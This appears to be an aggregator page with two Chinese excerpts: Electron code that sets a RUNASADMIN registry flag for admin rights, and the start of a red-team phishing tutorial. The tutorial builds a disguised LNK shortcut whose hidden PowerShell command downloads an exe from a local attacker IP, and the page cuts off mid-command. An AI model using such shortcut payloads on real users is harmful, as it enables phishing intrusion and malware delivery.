resource hacker

windows下electron开发应用如何获取管理员权限,通过修改注册表获取管理员权限【转】

狂风中的少年 提交于 2021-01-29 08:24:04
1 const {Registry} = require('rage-edit' ) 2 const {app } = require('electron' ) 3 4 module.exports = (cbSus,cbErr)=> { 5 Registry.set( 6 'HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Layers', // 固定,管理员权限应用列表 7 app.getPath('exe'), // 应用路径 8 '~ RUNASADMIN', // 固定写死 符号删除 9 'REG_SZ', // 固定写死 10 ) 11 } // https://blog.csdn.net/Wbiokr/article/details/85780906 通过插件rage-edit修改注册表,从而获取管理员权限 导入,运行即可,在注册表路径,即可看到相关修改 方法二(待验证) 1.生成项目 例如electron,使用electron-packager生成 目的,具有可以运行的exe文件 2.使生成的exe文件具备管理员权限 使用Resource Hacker工具(百度软件中心就可以下载)打开exe文件 修改: 1 < requestedExecutionLevel level =

邮件钓鱼攻击手法学习

时光怂恿深爱的人放手 提交于 2021-01-08 15:49:40
本文授权转载 来源: ChaBug 公众号 • 前言 在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下,顺便让好哥哥们复习一下基础。 钓鱼手段 Lnk(快捷方式) 可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD 当我点击谷歌浏览器时,弹出了CMD 可以进行更改图标 • 快速生成lnk样本 $WshShell = New-Object \-comObject WScript.Shell $Shortcut = $WshShell.CreateShortcut( "test.lnk" ) $Shortcut.TargetPath = "%SystemRoot%\\system32\\cmd.exe" $Shortcut.IconLocation = "%SystemRoot%\\System32\\Shell32.dll,21" $Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\\\